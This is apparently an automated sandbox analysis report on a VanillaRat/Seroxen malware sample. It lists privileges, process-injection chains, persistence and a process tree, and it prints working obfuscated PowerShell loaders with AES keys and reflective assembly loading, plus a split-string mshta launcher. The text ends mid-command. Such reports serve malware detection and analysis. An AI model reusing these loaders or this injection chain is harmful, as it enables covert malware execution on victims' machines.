Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2724 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2096 wrote to memory of 4632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2096 wrote to memory of 4632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4632 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 4632 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1728 wrote to memory of 2200 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1728 wrote to memory of 2200 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 2200 wrote to memory of 1452 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2200 wrote to memory of 1452 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4076 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 4076 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 4076 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3220 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 1452 wrote to memory of 3220 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 wrote to memory of 1784 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 1784 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 1784 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 wrote to memory of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe

"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e8ef9856-2242-4506-a2b7-6fc77981a37b}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{c0b360b8-a2cb-4a57-a190-137e05dafe32}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = 